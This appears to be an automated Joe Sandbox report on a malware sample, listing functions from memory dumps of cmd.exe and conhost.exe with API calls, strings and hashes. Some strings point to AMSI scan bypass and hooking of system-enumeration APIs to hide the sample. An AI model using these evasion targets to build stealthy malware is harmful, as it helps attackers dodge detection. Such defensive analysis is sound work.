Function 000001F1197980A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F1197980CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F119798162

Strings

csm, xrefs: 000001F119798149

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 278017b214f3b86cac2af6f4aa487c42388b2c3bec964a5dfcdd17b8fee2d692
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: DA51A032319A02EADB54CB35E444BF83392EB44BE8F958135DB6B47788E779C849CB01

Function 000001F119799AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001F119799BA7

Strings

MOC, xrefs: 000001F119799B6F
RCC, xrefs: 000001F119799B77

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 57f210cdb46e057946cbcae54786e64c11d60285d3996e22fdc3aa4e1a85be00
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: CA619132508BC5D5E7709F25E4407EAB7A1FB857D4F444225EBAA07B95EB78C194CB00

Function 000001F119D525DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F119D526C2
StrCpyW.SHLWAPI ref: 000001F119D526D9

Strings

\\.\pipe\, xrefs: 000001F119D526CD

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 0b9c551fef9ba0cf945f1aa0689a579e461a2a92cbea93b2179b9112dd0d9be1
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: AD51A13A20C78AE1FE24DE35A4543FA6662F395B90F840035EF6B53BA9DE39C408C740

Function 000001F1197D25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F1197D26C2
StrCpyW.SHLWAPI ref: 000001F1197D26D9

Strings

\\.\pipe\, xrefs: 000001F1197D26CD

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 6d116d03695d2485b7fd81e950c433c15aeb4669f4503b5c2889b00c5dc7765a
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: D351AF3720C782E1EA749A35A4543FE6692FBC4BF0F840035CF6A43B99DA36C50A8B40

Function 000001F119D62660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001F119D62778
GetLastError.KERNEL32 ref: 000001F119D6279D

Strings

U, xrefs: 000001F119D62722

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 4dbc32447c6e2d4530dfc1b8aa44c200b2c3a6399bea8dc449a76b107fc5046f
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: DC41D432619A89E6EB108F75E4447EAA7A2F358784FC04131EB5E87754EB38C441C780

Function 000001F1197E2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001F1197E2778
GetLastError.KERNEL32 ref: 000001F1197E279D

Strings

U, xrefs: 000001F1197E2722

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 075e0ee5ab856f52793fd74ad60e0d37977b86e05c2e5619eafe79c5092f8b8f
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: BE41E772629A95D6E7609F35E4047EAB7A1FB887C4F804131EF5E87754EB38C405CB44

Function 000001F119D59178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001F119D591C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001F119D587F7), ref: 000001F119D59209

Strings

csm, xrefs: 000001F119D591F6

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: eda675b608450d1b98c27133dd58fdb40deda528cd4d0094b9588a010599d30a
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 1A112B32218B8592EB218B25F4442A9B7E6F789B94F984224EF9E47B64DF3CC551CB00

Function 000001F1197D9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001F1197D91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001F1197D87F7), ref: 000001F1197D9209

Strings

csm, xrefs: 000001F1197D91F6

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: d0ea1f0f01099bba34f3f93ff3f253b38abdd96ae72080870b149aeeeb87dd36
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 3F112E32219B4592EB218B25F4442A977E6FB88B98F984220DF9E07B54DF3DC555CB00

Function 000001F119D51D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F119D51D69
HeapAlloc.KERNEL32 ref: 000001F119D51D77
GetProcessHeap.KERNEL32 ref: 000001F119D51D9C
HeapFree.KERNEL32 ref: 000001F119D51DAA

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 9aea890d2f69d4f4f6db632077a96361da4f8a665e7bf107ea741a3ee6150ebb
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 53115B21A15B89E6EE14CB76A8042A977B2F788FD0F984135DF5E53765EF38D482C340

Function 000001F119D51264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F119D5126A
HeapAlloc.KERNEL32 ref: 000001F119D51279
GetProcessHeap.KERNEL32 ref: 000001F119D51293
HeapAlloc.KERNEL32 ref: 000001F119D512A4

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: ac23ae9009e14ae519abc6e3ce89e3ddb5d4b4d182b87b14bd62545e88c2731c
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 22E06D31602609EBEB148F62D8083A936E2FB88F05FC4C024CA1A07350EF7D84D9C780

Function 000001F1197D1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F1197D126A
HeapAlloc.KERNEL32 ref: 000001F1197D1279
GetProcessHeap.KERNEL32 ref: 000001F1197D1293
HeapAlloc.KERNEL32 ref: 000001F1197D12A4

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: f4018e2778af764a71ec7319eb5c57e2044f0bfab1a600363d9fd178d11beafe
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 69E06531601619EAEB148F62D80839936E2FF88F45F84C024CA1A0B350EF7D849D8B41

Function 000001F119D51000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F119D51006
HeapAlloc.KERNEL32 ref: 000001F119D51015
GetProcessHeap.KERNEL32 ref: 000001F119D51028
HeapAlloc.KERNEL32 ref: 000001F119D51037

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 727118ef396b3c074debe071726d3083f61c787e5b250e753320eccf353fdf73
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 11E0ED71611509EBEB189B62D8042A976A2FB88B15FC48074CA1A07310EE3C84D9D650

Function 000001F1197D1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F1197D1006
HeapAlloc.KERNEL32 ref: 000001F1197D1015
GetProcessHeap.KERNEL32 ref: 000001F1197D1028
HeapAlloc.KERNEL32 ref: 000001F1197D1037

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: bdd1397b67824a9355833ff5b806eb658c9c9ea7f3d16c52e7659c855b548343
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: A9E0ED72611519EAEB189B62D8042A976A2FF88B55F848034CA1A0B310FE38849D9A11

Analysis Process: conhost.exePID: 7904, Parent PID: 7896COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1412
Total number of Limit Nodes:	6

Executed Functions

Function 00000166BE491E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000166BE491E7F

Part of subcall function 00000166BE4922A8: GetModuleHandleA.KERNEL32(?,?,?,00000166BE491EB1), ref: 00000166BE4922C0
Part of subcall function 00000166BE4922A8: GetProcAddress.KERNEL32(?,?,?,00000166BE491EB1), ref: 00000166BE4922D1

CreateThread.KERNELBASE ref: 00000166BE492043
TlsAlloc.KERNEL32 ref: 00000166BE492049
TlsAlloc.KERNEL32 ref: 00000166BE492055
TlsAlloc.KERNEL32 ref: 00000166BE492061
TlsAlloc.KERNEL32 ref: 00000166BE49206D
TlsAlloc.KERNEL32 ref: 00000166BE492079
TlsAlloc.KERNEL32 ref: 00000166BE492085

Strings

NtQueryDirectoryFileEx, xrefs: 00000166BE491EFC
ntdll.dll, xrefs: 00000166BE491E8D
amsi.dll, xrefs: 00000166BE492019
pdh.dll, xrefs: 00000166BE491FD7, 00000166BE491FF8
NtEnumerateKey, xrefs: 00000166BE491F19
sechost.dll, xrefs: 00000166BE491F99
PdhGetFormattedCounterArrayW, xrefs: 00000166BE491FF1
NtQuerySystemInformation, xrefs: 00000166BE491EA5
NtQueryDirectoryFile, xrefs: 00000166BE491EDF
EnumServiceGroupW, xrefs: 00000166BE491F50
AmsiScanBuffer, xrefs: 00000166BE492012
NtDeviceIoControlFile, xrefs: 00000166BE491FB6
PdhGetRawCounterArrayW, xrefs: 00000166BE491FD0
NtResumeThread, xrefs: 00000166BE491EC2
NtEnumerateValueKey, xrefs: 00000166BE491F36
advapi32.dll, xrefs: 00000166BE491F57, 00000166BE491F78
EnumServicesStatusExW, xrefs: 00000166BE491F71, 00000166BE491F92

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: d646218bd1a16b40507b9baa34c0bfef1b35b52de7166ef3c36d8ca0c6cbbaf3
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 3D51BF78B50A5AE9FB40EF64FE407D93321FB453E4F8425239409E2676DE3E824AC384

Function 00000166BE491E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000166BE491E47
GetProcAddress.KERNEL32 ref: 00000166BE491E57
SleepEx.KERNELBASE ref: 00000166BE491E67

Strings

AmsiScanBuffer, xrefs: 00000166BE491E50
amsi.dll, xrefs: 00000166BE491E40

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 6823a5c06b28b7e313a038231c85514f864161f9d188bc1741a55ab507bb9217
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: A2D09E34B95600E5FE586B11EE543E53262BF64BD1FC52435C50EC13B4DE3E85598740

Function 00000166BE493A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000166BE493A35
PathFindFileNameW.SHLWAPI ref: 00000166BE493A44

Part of subcall function 00000166BE493F88: StrCmpNIW.SHLWAPI(?,?,?,00000166BE49272F), ref: 00000166BE493FA0

Part of subcall function 00000166BE493EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493EDB
Part of subcall function 00000166BE493EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F0E
Part of subcall function 00000166BE493EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F2E
Part of subcall function 00000166BE493EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F47
Part of subcall function 00000166BE493EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F68

CreateThread.KERNELBASE ref: 00000166BE493A8B

Part of subcall function 00000166BE491E74: GetCurrentThread.KERNEL32 ref: 00000166BE491E7F
Part of subcall function 00000166BE491E74: CreateThread.KERNELBASE ref: 00000166BE492043
Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492049
Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492055
Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492061
Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE49206D
Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492079
Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492085

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 4c2b9fa9bb22a0279d3308a789aa57fc4105a4e4d1bc70ec457c81cb6e9be719
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 5411843DB10701DAFB60A770EF497ED22A1ABD63D7F5041299406E5AD2EF7FC4448600

Function 00000166BBF72EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00000166BBF7302E

Memory Dump Source

Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: bdcba82c18422573c66358a66c05c8d7857a041859baa63c20aa6a35a44999af
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 9C91277AB11151D7EB748F2AD800BADB399FB84B98F548124DE4987788DF76D813C700

Function 00000166BE491BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000166BE491724: GetProcessHeap.KERNEL32 ref: 00000166BE49172F
Part of subcall function 00000166BE491724: HeapAlloc.KERNEL32 ref: 00000166BE49173E
Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE4917AE
